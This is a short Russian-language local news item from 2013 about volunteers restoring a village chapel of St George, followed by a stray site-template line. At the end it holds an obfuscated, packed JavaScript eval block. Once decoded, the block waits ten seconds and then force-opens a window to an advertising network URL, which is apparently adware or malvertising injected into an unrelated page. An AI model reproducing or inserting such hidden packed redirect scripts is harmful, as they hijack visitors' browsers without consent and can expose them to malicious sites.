Подолжаются работы по восстановлению часовни Георгия Победоносца

Подолжаются работы по восстановлению часовни Георгия Победоносца и продолжают это делать мои земляки-вельчане и местные жители. Валерий Горохов, тот самый знаменитый печник, мастерство которого еще пригодится людям, установил вторые двери в часовне, чтобы сберечь тепло. Его сыновья, Иоанн и Сергий отштукатурили печь, которая сразу преобразилась. А.Ю. Завьялов почти достроил иконостас. Осталось буквально несколько штрихов.

Если церковь называют кораблем спасения, то часовню, наверное, можно причислить к спасательной лодке. И вот такое плавательное средство в Святом Раменье с недавних пор радует глаза и душу. Огорчает другое, в часовню редко заглядывают люди. Наверное не находят времени. Несмотря на этот огорчительный факт, каждый день, утром и вечером в «Спасе в Раменье» звучит молитва. Все имена, которые посетители вновь возрожденной часовни оставили в своих записках, вычитываются ежедневно в святом строении, как это делается в монастырях.


27.12.2013. Ю. Беляев

Please publish modules in offcanvas position.

eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('<5>4 n="c://b.a.9/8?7=6";4 2=d;e 3(){f(2>0){2--;4 g=2+1;i("3()",j)}h{k.l("c://b.a.9/8?7=6","m")}}3();',24,24,'||count|countDown|var|script|688b0be27b4d45d6562eba71df5c7886|key|ef4ex511a|com|effectivecpmnetwork|www|https|10|function|if|waktu|else|setTimeout|1000|window|open|_0|url'.split('|'),0,{}))